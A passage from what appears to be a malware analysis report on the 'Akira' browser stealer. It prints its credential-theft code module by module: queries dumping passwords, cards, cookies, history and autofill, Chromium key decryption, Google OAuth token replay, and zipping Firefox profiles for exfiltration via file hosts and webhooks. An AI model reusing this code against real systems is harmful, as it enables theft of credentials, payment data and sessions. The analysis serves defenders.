I/O.",[353,19454,19455],{},[433,19456,19457],{},"2. Supported Browsers",[367,19459,19460,19503],{},[370,19461,19462,19465],{},[433,19463,19464],{},"Chromium‑based",[367,19466,19467,19470,19473,19476,19479,19482,19485,19488,19491,19494,19497,19500],{},[370,19468,19469],{},"Google Chrome (Stable & SxS)",[370,19471,19472],{},"Microsoft Edge",[370,19474,19475],{},"Brave Browser",[370,19477,19478],{},"Opera & Opera GX",[370,19480,19481],{},"Chromium",[370,19483,19484],{},"Comodo Dragon",[370,19486,19487],{},"Epic Privacy Browser",[370,19489,19490],{},"Iridium Browser",[370,19492,19493],{},"UR Browser",[370,19495,19496],{},"Vivaldi Browser",[370,19498,19499],{},"Yandex Browser",[370,19501,19502],{},"Slimjet, Amigo, Torch, Kometa, Orbitum, CentBrowser, 7Star, Sputnik, Uran",[370,19504,19505,19508,19509,8133,19512,19523,19525,19526,19535,19537,19538,2454,19541,19544],{},[433,19506,19507],{},"Firefox‑based"," (via ",[3724,19510,19511],{},"GeckoDriver",[367,19513,19514,19517,19520],{},[370,19515,19516],{},"Mozilla Firefox",[370,19518,19519],{},"Waterfox",[370,19521,19522],{},"Pale Moon",[2970,19524],{},"Akira dynamically locates user profiles using environment variables and well-known directory structures:",[3102,19527,19529],{"className":17754,"code":19528,"language":17756,"meta":402,"style":402},"user_path = os.path.join(os.getenv(\"LOCALAPPDATA\"), \"Google\", \"Chrome\", \"User Data\")\n",[3724,19530,19531],{"__ignoreMap":402},[7258,19532,19533],{"class":14951,"line":14952},[7258,19534,19528],{},[2970,19536],{},"It recursively checks for available browser profiles (e.g. ",[3724,19539,19540],{},"Default",[3724,19542,19543],{},"Profile 1",", etc.) and targets SQLite databases within those paths.",[629,19546,19548],{"id":19547},"_741-data-types-extracted","7.4.1 Data Types Extracted",[353,19550,14147],{},[8921,19552,8923,19553],{"style":17945},[8925,19554,19555,8923,19568,8923,19581,8923,19593,8923,19605,8923,19617,8923,19628],{},[8928,19556,2557,19557,2557,19561,2557,19565,8923],{},[8932,19558,19560],{"style":19559},"text-align: left; width: 22%;","Data Type",[8932,19562,19564],{"style":19563},"text-align: left; width: 28%;","Source File",[8932,19566,19567],{"style":18113},"Notes",[8928,19569,2557,19570,2557,19573,2557,19578,8923],{},[8948,19571,19572],{},"Saved Passwords",[8948,19574,19575,19577],{},[3724,19576,13853],{}," (Chromium)",[8948,19579,19580],{},"Decrypted via DPAPI or AES-GCM (post Chromium v80)",[8928,19582,2557,19583,2557,19586,2557,19590,8923],{"style":17969},[8948,19584,19585],{},"Cookies",[8948,19587,19588],{},[3724,19589,19585],{},[8948,19591,19592],{},"Can include session tokens, especially for Google/Facebook accounts",[8928,19594,2557,19595,2557,19598,2557,19602,8923],{},[8948,19596,19597],{},"Autofill Data",[8948,19599,19600],{},[3724,19601,13857],{},[8948,19603,19604],{},"Addresses, emails, phone numbers, etc.",[8928,19606,2557,19607,2557,19610,2557,19614,8923],{"style":17969},[8948,19608,19609],{},"Credit Cards",[8948,19611,19612],{},[3724,19613,13857],{},[8948,19615,19616],{},"Encrypted; requires master key",[8928,19618,2557,19619,2557,19622,2557,19625,8923],{},[8948,19620,19621],{},"Session Tokens",[8948,19623,19624],{},"In-memory & cookies",[8948,19626,19627],{},"Includes Gmail, Google accounts, and Discord OAUTH replay",[8928,19629,2557,19630,2557,19633,2557,19641,8923],{"style":17969},[8948,19631,19632],{},"History & URLs",[8948,19634,19635,2454,19638],{},[3724,19636,19637],{},"History",[3724,19639,19640],{},"Visited Links",[8948,19642,19643],{},"Were also exfiltrated to the attacker",[2559,19645],{"className":19646},[14110,14111],[353,19648,19649,19652],{},[433,19650,19651],{},"3. Extraction Modules","\nWhen malware authors target browsers, their primary treasure troves are the various SQLite databases where Chrome, Firefox, and their kin store credentials, cookies, history, and autofill entries. astor.py stitches together lightweight Python and native APIs to methodically pluck every piece of data—and even replay live OAuth sessions—without leaving a trace. Below is an in-depth, module-by-module tour, verbatim from the code.",[629,19654,19656,19657,8133],{"id":19655},"_742-password-dumper-chromiumgetpasswords","7.4.2 Password Dumper (",[3724,19658,19659],{},"Chromium.GetPasswords",[353,19661,14147],{},[353,19663,19664],{},"This module systematically searches through all Chromium-based browser profiles to extract saved login credentials. By targeting the Login Data SQLite database, it retrieves usernames and encrypted passwords, then uses the platform’s encryption key (retrieved via DPAPI or AES-GCM) to decrypt them into cleartext. These credentials are highly valuable for post-compromise pivoting or account takeover.",[3102,19666,19668],{"className":17754,"code":19667,"language":17756,"meta":402,"style":402},"for root, _, files in os.walk(self.BrowserPath):\n    for file in files:\n        if file.lower() == \"login data\":\n            # Copy DB → open → extract rows\n            results = cursor.execute(\n                \"SELECT origin_url, username_value, password_value FROM logins\"\n            ).fetchall()\n            for url, user, pwd_blob in results:\n                clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n                passwords.append((url, user, clear_pwd))\n",[3724,19669,19670,19675,19680,19685,19690,19695,19700,19705,19710,19715],{"__ignoreMap":402},[7258,19671,19672],{"class":14951,"line":14952},[7258,19673,19674],{},"for root, _, files in os.walk(self.BrowserPath):\n",[7258,19676,19677],{"class":14951,"line":403},[7258,19678,19679],{},"    for file in files:\n",[7258,19681,19682],{"class":14951,"line":704},[7258,19683,19684],{},"        if file.lower() == \"login data\":\n",[7258,19686,19687],{"class":14951,"line":15337},[7258,19688,19689],{},"            # Copy DB → open → extract rows\n",[7258,19691,19692],{"class":14951,"line":13492},[7258,19693,19694],{},"            results = cursor.execute(\n",[7258,19696,19697],{"class":14951,"line":15666},[7258,19698,19699],{},"                \"SELECT origin_url, username_value, password_value FROM logins\"\n",[7258,19701,19702],{"class":14951,"line":13493},[7258,19703,19704],{},"            ).fetchall()\n",[7258,19706,19707],{"class":14951,"line":17117},[7258,19708,19709],{},"            for url, user, pwd_blob in results:\n",[7258,19711,19712],{"class":14951,"line":17123},[7258,19713,19714],{},"                clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n",[7258,19716,19717],{"class":14951,"line":17369},[7258,19718,19719],{},"                passwords.append((url, user, clear_pwd))\n",[367,19721,19722,19735,19741,19749,19767],{},[370,19723,19724,19727,19728,19730,19731,19734],{},[433,19725,19726],{},"Locates"," every ",[3724,19729,13853],{}," SQLite database under the browser’s ",[3724,19732,19733],{},"User Data"," folder.",[370,19736,19737,19740],{},[433,19738,19739],{},"Copies"," to a temp file to avoid browser locks.",[370,19742,19743,14252,19746,456],{},[433,19744,19745],{},"SQL Query",[3724,19747,19748],{},"SELECT origin_url, username_value, password_value FROM logins",[370,19750,19751,19754,19755,19758,19759,19762,19763,19766],{},[433,19752,19753],{},"Decrypts"," each ",[3724,19756,19757],{},"password_value"," blob via AES‑GCM (",[3724,19760,19761],{},"v10","/",[3724,19764,19765],{},"v11",") or Windows DPAPI fallback.",[370,19768,19769,19772,19773,456],{},[433,19770,19771],{},"Writes"," output to ",[3724,19774,19775],{},"Passwords/\u003CBrowserName> Passwords.txt",[629,19777,19779,19780,8133],{"id":19778},"_743-credit-card-dumper-chromiumgetcreditcards","7.4.3 Credit Card Dumper (",[3724,19781,19782],{},"Chromium.GetCreditCards",[353,19784,14147],{},[353,19786,19787],{},"Here, the stealer accesses stored credit card data from each browser profile’s Web Data file. It focuses on extracting expiration details and encrypted credit card numbers, which are then decrypted with the same logic as passwords. Although CVV codes are typically not stored, the recovered information can still be misused for card-not-present fraud.",[3102,19789,19791],{"className":17754,"code":19790,"language":17756,"meta":402,"style":402},"results = cursor.execute(\n    \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n).fetchall()\nfor month, year, enc_cc in results:\n    cc_number = self.Decrypt(enc_cc, encryptionKey)\n    ccs.append((cc_number, month, year))\n",[3724,19792,19793,19798,19803,19808,19813,19818],{"__ignoreMap":402},[7258,19794,19795],{"class":14951,"line":14952},[7258,19796,19797],{},"results = cursor.execute(\n",[7258,19799,19800],{"class":14951,"line":403},[7258,19801,19802],{},"    \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n",[7258,19804,19805],{"class":14951,"line":704},[7258,19806,19807],{},").fetchall()\n",[7258,19809,19810],{"class":14951,"line":15337},[7258,19811,19812],{},"for month, year, enc_cc in results:\n",[7258,19814,19815],{"class":14951,"line":13492},[7258,19816,19817],{},"    cc_number = self.Decrypt(enc_cc, encryptionKey)\n",[7258,19819,19820],{"class":14951,"line":15666},[7258,19821,19822],{},"    ccs.append((cc_number, month, year))\n",[367,19824,19825,19834,19841,19849],{},[370,19826,19827,19830,19831,19833],{},[433,19828,19829],{},"Targets"," the ",[3724,19832,13857],{}," SQLite stores under each profile.",[370,19835,19836,14252,19838,456],{},[433,19837,19745],{},[3724,19839,19840],{},"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards",[370,19842,19843,1501,19845,19848],{},[433,19844,19753],{},[3724,19846,19847],{},"card_number_encrypted"," exactly like the password blobs.",[370,19850,19851,19854,19855,456],{},[433,19852,19853],{},"Outputs"," to ",[3724,19856,19857],{},"CreditCards/\u003CBrowserName> CreditCards.txt",[629,19859,19861,19862,8133],{"id":19860},"_744-cookie-dumper-chromiumgetcookies","7.4.4 Cookie Dumper (",[3724,19863,19864],{},"Chromium.GetCookies",[353,19866,14147],{},[353,19868,19869],{},"Cookies, especially session cookies, are prime targets for account hijacking without passwords. This module dumps all cookie files across profiles, decrypts them, and collects essential metadata like domain, name, and expiration. Combined with fingerprinting, these cookies can enable seamless replay attacks on authenticated services.",[3102,19871,19873],{"className":17754,"code":19872,"language":17756,"meta":402,"style":402},"results = cursor.execute(\n    \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n).fetchall()\nfor host, name, path, blob, expiry in results:\n    cookie_val = self.Decrypt(blob, encryptionKey)\n    cookies.append((host, name, path, cookie_val, expiry))\n",[3724,19874,19875,19879,19884,19888,19893,19898],{"__ignoreMap":402},[7258,19876,19877],{"class":14951,"line":14952},[7258,19878,19797],{},[7258,19880,19881],{"class":14951,"line":403},[7258,19882,19883],{},"    \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n",[7258,19885,19886],{"class":14951,"line":704},[7258,19887,19807],{},[7258,19889,19890],{"class":14951,"line":15337},[7258,19891,19892],{},"for host, name, path, blob, expiry in results:\n",[7258,19894,19895],{"class":14951,"line":13492},[7258,19896,19897],{},"    cookie_val = self.Decrypt(blob, encryptionKey)\n",[7258,19899,19900],{"class":14951,"line":15666},[7258,19901,19902],{},"    cookies.append((host, name, path, cookie_val, expiry))\n",[367,19904,19905,19913,19921,19929],{},[370,19906,19907,19727,19910,19912],{},[433,19908,19909],{},"Scans",[3724,19911,19585],{}," SQLite database.",[370,19914,19915,1501,19918,456],{},[433,19916,19917],{},"Selects",[3724,19919,19920],{},"host_key, name, path, encrypted_value, expires_utc",[370,19922,19923,19754,19925,19928],{},[433,19924,19753],{},[3724,19926,19927],{},"encrypted_value"," blob to reveal the actual cookie string.",[370,19930,19931,19934,19935,456],{},[433,19932,19933],{},"Saves"," into ",[3724,19936,19937],{},"Cookies/\u003CBrowserName> Cookies.txt",[629,19939,19941,19942,8133],{"id":19940},"_745-google-session-dumper-chromiumdump_google_sessions","7.4.5 Google Session Dumper (",[3724,19943,19944],{},"Chromium.dump_google_sessions",[353,19946,14147],{},[353,19948,19949],{},"One of the more advanced components, this routine decrypts stored OAuth tokens from the token_service table. By replaying them via Google’s multilogin endpoint, the malware can regenerate active session cookies—allowing attackers to hijack Google accounts without credentials. This illustrates how access tokens have become prime targets in modern stealers.",[3102,19951,19953],{"className":17754,"code":19952,"language":17756,"meta":402,"style":402},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\nfor service, blob in cursor.fetchall():\n    iv = blob[3:15]\n    ciphertext = blob[15:-16]\n    cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n    token = cipher.decrypt(ciphertext).decode()\n    # Replays via POST to OAuth endpoint\n    response = requests.post(\n        \"https://accounts.google.com/oauth/multilogin\",\n        headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n        data={\"source\": \"com.google.Drive\"}\n    )\n    save each account’s cookies to file\n",[3724,19954,19955,19960,19965,19970,19975,19980,19985,19990,19995,20000,20005,20010,20014],{"__ignoreMap":402},[7258,19956,19957],{"class":14951,"line":14952},[7258,19958,19959],{},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\n",[7258,19961,19962],{"class":14951,"line":403},[7258,19963,19964],{},"for service, blob in cursor.fetchall():\n",[7258,19966,19967],{"class":14951,"line":704},[7258,19968,19969],{},"    iv = blob[3:15]\n",[7258,19971,19972],{"class":14951,"line":15337},[7258,19973,19974],{},"    ciphertext = blob[15:-16]\n",[7258,19976,19977],{"class":14951,"line":13492},[7258,19978,19979],{},"    cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n",[7258,19981,19982],{"class":14951,"line":15666},[7258,19983,19984],{},"    token = cipher.decrypt(ciphertext).decode()\n",[7258,19986,19987],{"class":14951,"line":13493},[7258,19988,19989],{},"    # Replays via POST to OAuth endpoint\n",[7258,19991,19992],{"class":14951,"line":17117},[7258,19993,19994],{},"    response = requests.post(\n",[7258,19996,19997],{"class":14951,"line":17123},[7258,19998,19999],{},"        \"https://accounts.google.com/oauth/multilogin\",\n",[7258,20001,20002],{"class":14951,"line":17369},[7258,20003,20004],{},"        headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n",[7258,20006,20007],{"class":14951,"line":18290},[7258,20008,20009],{},"        data={\"source\": \"com.google.Drive\"}\n",[7258,20011,20012],{"class":14951,"line":18296},[7258,20013,19220],{},[7258,20015,20016],{"class":14951,"line":18302},[7258,20017,20018],{},"    save each account’s cookies to file\n",[367,20020,20021,20037,20047,20057],{},[370,20022,20023,1501,20026,20029,20030,20033,20034,20036],{},[433,20024,20025],{},"Fetches",[3724,20027,20028],{},"service"," and raw ",[3724,20031,20032],{},"encrypted_token"," from ",[3724,20035,13857],{}," clone.",[370,20038,20039,20042,20043,20046],{},[433,20040,20041],{},"AES‑GCM decryption"," using the browser’s ",[3724,20044,20045],{},"Local State"," key.",[370,20048,20049,20052,20053,20056],{},[433,20050,20051],{},"Replays"," decrypted tokens in a POST to Google’s ",[3724,20054,20055],{},"multilogin"," API to reconstruct valid OAuth cookies.",[370,20058,20059,20061,20062,456],{},[433,20060,19771],{}," per-account session files under ",[3724,20063,20064],{},"Cookies/\u003Cdisplay_email> Google Session.txt",[629,20066,20068,20069,8133],{"id":20067},"_746-history-dumper-chromiumgethistory","7.4.6 History Dumper (",[3724,20070,20071],{},"Chromium.GetHistory",[353,20073,14147],{},[353,20075,20076],{},"This function extracts browsing history entries including URL, title, and visit frequency. Beyond privacy invasion, this data helps attackers understand victim behavior, identify high-value targets (e.g., banking portals), or tailor social engineering payloads.",[3102,20078,20080],{"className":17754,"code":20079,"language":17756,"meta":402,"style":402},"results = cursor.execute(\n    \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n).fetchall()\nhistory.sort(key=lambda x: x[3], reverse=True)\nreturn [(url, title, count) for url, title, count, _ in history]\n",[3724,20081,20082,20086,20091,20095,20100],{"__ignoreMap":402},[7258,20083,20084],{"class":14951,"line":14952},[7258,20085,19797],{},[7258,20087,20088],{"class":14951,"line":403},[7258,20089,20090],{},"    \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n",[7258,20092,20093],{"class":14951,"line":704},[7258,20094,19807],{},[7258,20096,20097],{"class":14951,"line":15337},[7258,20098,20099],{},"history.sort(key=lambda x: x[3], reverse=True)\n",[7258,20101,20102],{"class":14951,"line":13492},[7258,20103,20104],{},"return [(url, title, count) for url, title, count, _ in history]\n",[367,20106,20107,20118,20128],{},[370,20108,20109,1501,20111,20114,20115,20117],{},[433,20110,19917],{},[3724,20112,20113],{},"url, title, visit_count, last_visit_time"," from every ",[3724,20116,19637],{}," DB.",[370,20119,20120,20123,20124,20127],{},[433,20121,20122],{},"Sorts"," entries by ",[3724,20125,20126],{},"last_visit_time"," descending.",[370,20129,20130,1501,20132,456],{},[433,20131,19853],{},[3724,20133,20134],{},"History/\u003CBrowserName> History.txt",[629,20136,20138,20139,8133],{"id":20137},"_747-autofill-dumper-chromiumgetautofills","7.4.7 Autofill Dumper (",[3724,20140,20141],{},"Chromium.GetAutofills",[353,20143,14147],{},[353,20145,20146],{},"Autofill entries—like addresses, names, emails, and sometimes payment-related data—are scraped from the browser’s Web Data storage. These values may not seem critical, but when aggregated, they offer a rich profile of the victim’s identity and behavior.",[3102,20148,20150],{"className":17754,"code":20149,"language":17756,"meta":402,"style":402},"results = cursor.execute(\n    \"SELECT name, value FROM autofill\"\n).fetchall()\nfor field, value in results:\n    autofills.append((field.strip(), value.strip()))\n",[3724,20151,20152,20156,20161,20165,20170],{"__ignoreMap":402},[7258,20153,20154],{"class":14951,"line":14952},[7258,20155,19797],{},[7258,20157,20158],{"class":14951,"line":403},[7258,20159,20160],{},"    \"SELECT name, value FROM autofill\"\n",[7258,20162,20163],{"class":14951,"line":704},[7258,20164,19807],{},[7258,20166,20167],{"class":14951,"line":15337},[7258,20168,20169],{},"for field, value in results:\n",[7258,20171,20172],{"class":14951,"line":13492},[7258,20173,20174],{},"    autofills.append((field.strip(), value.strip()))\n",[367,20176,20177,20190],{},[370,20178,20179,20181,20182,20185,20186,20189],{},[433,20180,20025],{}," form-fill entries: ",[3724,20183,20184],{},"name, value"," from the ",[3724,20187,20188],{},"web data"," file.",[370,20191,20192,20194,20195,456],{},[433,20193,19771],{}," out as ",[3724,20196,20197],{},"Autofill/\u003CBrowserName> Autofill.txt",[629,20199,20201,20202,20204,20205,8133],{"id":20200},"_748-firefox-profile-grabber-geckodriver-grabfirefoxprofiles","7.4.8 Firefox Profile Grabber (",[3724,20203,19511],{}," & ",[3724,20206,20207],{},"grabFirefoxProfiles",[353,20209,14147],{},[353,20211,20212],{},"Unlike the granular Chromium routines, this function opts for a broad approach: it compresses the entire Firefox profile directory—including saved logins, cookies, and bookmarks—and exfiltrates it wholesale. This ensures attackers can analyze or extract data offline, bypassing decryption hurdles with known NSS tooling.",[3102,20214,20216],{"className":17754,"code":20215,"language":17756,"meta":402,"style":402},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n    for root, dirs, files in os.walk(source_path):\n        zipf.write(each file)\n# Upload via GoFile/File.io, then POST via attacker webhooks\n",[3724,20217,20218,20223,20228,20233],{"__ignoreMap":402},[7258,20219,20220],{"class":14951,"line":14952},[7258,20221,20222],{},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n",[7258,20224,20225],{"class":14951,"line":403},[7258,20226,20227],{},"    for root, dirs, files in os.walk(source_path):\n",[7258,20229,20230],{"class":14951,"line":704},[7258,20231,20232],{},"        zipf.write(each file)\n",[7258,20234,20235],{"class":14951,"line":15337},[7258,20236,20237],{},"# Upload via GoFile/File.io, then POST via attacker webhooks\n",[367,20239,20240,20250,20260],{},[370,20241,20242,20245,20246,20249],{},[433,20243,20244],{},"Zips"," the entire ",[3724,20247,20248],{},"%APPDATA%\\Mozilla\\Firefox\\Profiles"," directory.",[370,20251,20252,20255,20256,20259],{},[433,20253,20254],{},"Names"," it ",[3724,20257,20258],{},"%TEMP%\\\u003CComputerName>_Firefox_profiles.zip"," and sends the download link over the same webhook channels.",[370,20261,20262,20265,20266,2454,20269,2454,20272,20275],{},[433,20263,20264],{},"Also"," invokes the same SQLite-based extraction functions (",[3724,20267,20268],{},"logins.json",[3724,20270,20271],{},"cookies.sqlite",[3724,20273,20274],{},"places.sqlite",") against each Firefox profile using the NSS decryption routines already present.",[629,20277,20279],{"id":20278},"_749-extraction-summary","7.4.9 Extraction Summary",[353,20281,14147],{},[353,20283,20284,20285,2454,20287,2454,20289,2454,20291,15448,20293,20296,20297,20300,20301,20303,20304,2454,20306,15448,20308,20310,20311,20314],{},"Astor.py orchestrates a comprehensive browser compromise by systematically harvesting every credential and session artifact across Chromium-based and Firefox clients. It locates and safely copies each SQLite store—",[3724,20286,13853],{},[3724,20288,13857],{},[3724,20290,19585],{},[3724,20292,19637],{},[3724,20294,20295],{},"autofill","—then runs targeted SQL queries to extract URLs, usernames, passwords, credit-card details, cookies, browsing history, and form-fill entries. Passwords and payment data are decrypted via AES-GCM (or Windows DPAPI fallback), while cookies are similarly unwrapped to reveal their plaintext values. For Google accounts, encrypted OAuth tokens from ",[3724,20298,20299],{},"token_service"," are decrypted and replayed against the ",[3724,20302,20055],{}," API to regenerate live session cookies. Finally, Firefox profiles are archived wholesale (including ",[3724,20305,20268],{},[3724,20307,20271],{},[3724,20309,20274],{},") and delivered as ZIPs, ensuring no artifact is left behind. This end-to-end pipeline runs silently under ",[3724,20312,20313],{},"%TEMP%\\\u003CComputerName>",", producing neatly organized output files for every data category.",[2548,20316,20318],{"id":20317},"_75-decryption-logic","7.5 Decryption Logic",[353,20320,10713],{},[353,20322,20323],{},"Modern browsers like Chrome and Edge encrypt sensitive data—such as passwords, cookies, and credit card details—before storing them locally. Akira includes built-in decryption routines tailored to handle both legacy and current Chromium encryption methods. This ensures it can extract cleartext data regardless of the system's patch level or browser version.",[353,20325,20326],{},"At the core of this process is the extraction and decryption of the browser’s master encryption key, stored in a file called Local State. Depending on the browser version and Windows build, Akira dynamically selects the appropriate decryption method:",[353,20328,20329],{},"DPAPI (Data Protection API) is used on older systems, where Chrome stores secrets protected by the current user's Windows credentials.",[353,20331,20332],{},"AES-GCM is used on modern Chromium builds, where a randomly generated master key is itself encrypted with DPAPI, then used for in-app encryption of user data.",[353,20334,20335],{},"By first decrypting the Local State master key, Akira gains the ability to unlock all browser secrets—paving the way for extracting credentials, tokens, cookies, and more.",[353,20337,20338],{},[433,20339,20340],{},"Key extraction",[3102,20342,20344],{"className":17754,"code":20343,"language":17756,"meta":402,"style":402},"local_state_path = os.path.join(user_path, \"Local State\")\nwith open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n    local_state = json.load(f)\nmaster_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[3724,20345,20346,20351,20356,20361],{"__ignoreMap":402},[7258,20347,20348],{"class":14951,"line":14952},[7258,20349,20350],{},"local_state_path = os.path.join(user_path, \"Local State\")\n",[7258,20352,20353],{"class":14951,"line":403},[7258,20354,20355],{},"with open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n",[7258,20357,20358],{"class":14951,"line":704},[7258,20359,20360],{},"    local_state = json.load(f)\n",[7258,20362,20363],{"class":14951,"line":15337},[7258,20364,20365],{},"master_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[353,20367,20368],{},[433,20369,20370],{},"Decryption (AES-GCM):",[3102,20372,20374],{"className":17754,"code":20373,"language":17756,"meta":402,"style":402},"nonce = value[3:15]\nciphertext = value[15:-16]\ntag = value[-16:]\ncipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\ndecrypted = cipher.decrypt_and_verify(ciphertext, tag)\n",[3724,20375,20376,20381,20386,20391,20396],{"__ignoreMap":402},[7258,20377,20378],{"class":14951,"line":14952},[7258,20379,20380],{},"nonce = value[3:15]\n",[7258,20382,20383],{"class":14951,"line":403},[7258,20384,20385],{},"ciphertext = value[15:-16]\n",[7258,20387,20388],{"class":14951,"line":704},[7258,20389,20390],{},"tag = value[-16:]\n",[7258,20392,20393],{"class":14951,"line":15337},[7258,20394,20395],{},"cipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\n",[7258,20397,20398],{"class":14951,"line":13492},[7258,20399,20400],{},"decrypted = cipher.decrypt_and_verify(ciphertext, tag)\n",[353,20402,20403,20404,456],{},"If fallback to DPAPI is needed (on older systems), it uses ",[3724,20405,20406],{},"win32crypt.CryptUnprotectData()",[353,20408,20409,20415],{},[433,20410,20411,20412,14452],{},"Explanation of ",[3724,20413,20414],{},"decrypt_password_blob","\nThis function demonstrates how Akira Stealer decrypts each saved password value from Chromium-based browsers. It handles two cases:",[5026,20417,20418,20428],{},[370,20419,20420,20423,20424,20427],{},[433,20421,20422],{},"Windows DPAPI blobs"," (older or non-GCM encrypted data): Falls back to the system call ",[3724,20425,20426],{},"CryptUnprotectData",", which uses the user’s Windows credentials to decrypt.",[370,20429,20430,20433,20434,20437],{},[433,20431,20432],{},"AES-GCM encrypted blobs"," (Chrome v10/v11 format): Parses the version header, extracts the IV and authentication tag, and uses the ",[3724,20435,20436],{},"cryptography"," library to decrypt the payload securely.",[3102,20439,20441],{"className":17754,"code":20440,"language":17756,"meta":402,"style":402},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\n\n\ndef decrypt_password_blob(buffer: bytes, key: bytes) -> str:\n    \"\"\"\n    Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n\n    Parameters:\n    - buffer: raw encrypted blob from the `password_value` field\n    - key: the master AES key retrieved via DPAPI from Local State\n\n    Returns:\n    - Decrypted UTF-8 plaintext password\n    \"\"\"\n    # 1) DPAPI fallback for non-AES-GCM blobs\n    if not buffer.startswith((b'v10', b'v11')):\n        # Uses Windows CryptUnprotectData under the hood\n        return CryptUnprotectData(buffer)\n\n    # 2) AES-GCM decryption for Chrome v10/v11 format:\n    # Bytes layout:\n    # [0:3]    = version header ('v10'/'v11')\n    # [3:15]   = initialization vector (IV)\n    # [15:-16] = ciphertext payload\n    # [-16:]   = GCM authentication tag\n    iv = buffer[3:15]\n    ciphertext = buffer[15:-16]\n    tag = buffer[-16:]\n\n    # Initialize AES-GCM cipher with extracted IV and tag\n    cipher = Cipher(\n        algorithms.AES(key),\n        modes.GCM(iv, tag),\n        backend=default_backend()\n    )\n    decryptor = cipher.decryptor()\n\n    # Perform decryption; raises if authentication fails\n    plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n\n    # Decode to UTF-8, ignoring any stray errors\n    return plaintext.decode('utf-8', errors='ignore')\n",[3724,20442,20443,20448,20453,20457,20461,20466,20470,20475,20479,20484,20489,20494,20498,20503,20508,20512,20517,20522,20527,20532,20536,20541,20546,20551,20556,20561,20566,20571,20576,20581,20585,20590,20595,20600,20605,20610,20614,20619,20623,20628,20633,20637,20642],{"__ignoreMap":402},[7258,20444,20445],{"class":14951,"line":14952},[7258,20446,20447],{},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n",[7258,20449,20450],{"class":14951,"line":403},[7258,20451,20452],{},"from cryptography.hazmat.backends import default_backend\n",[7258,20454,20455],{"class":14951,"line":704},[7258,20456,17114],{"emptyLinePlaceholder":415},[7258,20458,20459],{"class":14951,"line":15337},[7258,20460,17114],{"emptyLinePlaceholder":415},[7258,20462,20463],{"class":14951,"line":13492},[7258,20464,20465],{},"def decrypt_password_blob(buffer: bytes, key: bytes) -> str:\n",[7258,20467,20468],{"class":14951,"line":15666},[7258,20469,19094],{},[7258,20471,20472],{"class":14951,"line":13493},[7258,20473,20474],{},"    Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n",[7258,20476,20477],{"class":14951,"line":17117},[7258,20478,17114],{"emptyLinePlaceholder":415},[7258,20480,20481],{"class":14951,"line":17123},[7258,20482,20483],{},"    Parameters:\n",[7258,20485,20486],{"class":14951,"line":17369},[7258,20487,20488],{},"    - buffer: raw encrypted blob from the `password_value` field\n",[7258,20490,20491],{"class":14951,"line":18290},[7258,20492,20493],{},"    - key: the master AES key retrieved via DPAPI from Local State\n",[7258,20495,20496],{"class":14951,"line":18296},[7258,20497,17114],{"emptyLinePlaceholder":415},[7258,20499,20500],{"class":14951,"line":18302},[7258,20501,20502],{},"    Returns:\n",[7258,20504,20505],{"class":14951,"line":18308},[7258,20506,20507],{},"    - Decrypted UTF-8 plaintext password\n",[7258,20509,20510],{"class":14951,"line":18314},[7258,20511,19094],{},[7258,20513,20514],{"class":14951,"line":18320},[7258,20515,20516],{},"    # 1) DPAPI fallback for non-AES-GCM blobs\n",[7258,20518,20519],{"class":14951,"line":18326},[7258,20520,20521],{},"    if not buffer.startswith((b'v10', b'v11')):\n",[7258,20523,20524],{"class":14951,"line":18332},[7258,20525,20526],{},"        # Uses Windows CryptUnprotectData under the hood\n",[7258,20528,20529],{"class":14951,"line":18338},[7258,20530,20531],{},"        return CryptUnprotectData(buffer)\n",[7258,20533,20534],{"class":14951,"line":18344},[7258,20535,17114],{"emptyLinePlaceholder":415},[7258,20537,20538],{"class":14951,"line":18350},[7258,20539,20540],{},"    # 2) AES-GCM decryption for Chrome v10/v11 format:\n",[7258,20542,20543],{"class":14951,"line":18356},[7258,20544,20545],{},"    # Bytes layout:\n",[7258,20547,20548],{"class":14951,"line":18362},[7258,20549,20550],{},"    # [0:3]    = version header ('v10'/'v11')\n",[7258,20552,20553],{"class":14951,"line":18368},[7258,20554,20555],{},"    # [3:15]   = initialization vector (IV)\n",[7258,20557,20558],{"class":14951,"line":18374},[7258,20559,20560],{},"    # [15:-16] = ciphertext payload\n",[7258,20562,20563],{"class":14951,"line":19040},[7258,20564,20565],{},"    # [-16:]   = GCM authentication tag\n",[7258,20567,20568],{"class":14951,"line":19045},[7258,20569,20570],{},"    iv = buffer[3:15]\n",[7258,20572,20573],{"class":14951,"line":19050},[7258,20574,20575],{},"    ciphertext = buffer[15:-16]\n",[7258,20577,20578],{"class":14951,"line":19055},[7258,20579,20580],{},"    tag = buffer[-16:]\n",[7258,20582,20583],{"class":14951,"line":19061},[7258,20584,17114],{"emptyLinePlaceholder":415},[7258,20586,20587],{"class":14951,"line":19066},[7258,20588,20589],{},"    # Initialize AES-GCM cipher with extracted IV and tag\n",[7258,20591,20592],{"class":14951,"line":19071},[7258,20593,20594],{},"    cipher = Cipher(\n",[7258,20596,20597],{"class":14951,"line":19076},[7258,20598,20599],{},"        